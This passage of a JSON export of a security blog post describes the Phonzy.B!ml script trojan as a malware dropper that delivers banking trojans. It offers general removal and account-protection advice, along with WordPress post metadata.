To protect your financial information after a Phonzy infection, you should completely remove all malware, reset your browsers, change passwords for all financial accounts using a clean device, and monitor your accounts for unauthorized activity.<\/p>\r\n\r\n\r\n\r\n","protected":false},"excerpt":{"rendered":"<p>Trojan:Script\/Phonzy.B!ml is a generic detection name used by Microsoft Defender for a dangerous loader malware. This threat primarily functions as a dropper, downloading and executing additional malicious payloads onto infected systems. In numerous documented infection cases, Phonzy trojan has been observed delivering banking trojans designed to steal financial credentials. Attribute Details Threat Name Trojan:Script\/Phonzy.B!ml Type [&hellip;]<\/p>\n","protected":false},"author":7,"featured_media":20062,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"content-type":"","_sitemap_exclude":false,"_sitemap_priority":"","_sitemap_frequency":"","footnotes":""},"categories":[17],"tags":[456,540,24,223],"class_list":{"0":"post-19960","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-labs","8":"tag-malware-removal","9":"tag-script-based","10":"tag-trojan","11":"tag-windows-defender"},"featured_image_src":"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/phonzy-bml-featured.webp","author_info":{"display_name":"Stephanie 
Adlam","author_link":"https:\/\/gridinsoft.com\/blogs\/author\/adlam\/"},"_links":{"self":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/19960","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/comments?post=19960"}],"version-history":[{"count":28,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/19960\/revisions"}],"predecessor-version":[{"id":30530,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/19960\/revisions\/30530"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media\/20062"}],"wp:attachment":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media?parent=19960"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/categories?post=19960"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/tags?post=19960"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}